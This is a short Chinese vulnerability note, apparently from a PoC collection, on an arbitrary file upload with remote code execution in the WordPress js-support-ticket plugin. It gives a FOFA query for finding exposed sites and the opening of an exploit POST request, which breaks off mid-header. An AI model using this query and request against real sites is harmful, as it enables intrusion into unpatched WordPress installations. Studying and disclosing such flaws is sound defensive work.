简介
WordPress js-support-ticket存在一个严重的安全漏洞,攻击者可以在安装了js-support-ticket的任何WordPress网站上任意上传文件并远程代码执行。
漏洞描述
WordPress js-support-ticket插件saveconfiguration功能文件上传漏洞
Fofa语法与漏洞编号
FOFA:
body="wp-content/plugins/js-support-ticket"
影响资产数量:2,668
CNVD漏洞编号:无
影响版本
WordPress js-support-ticket
漏洞复现
POC
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/for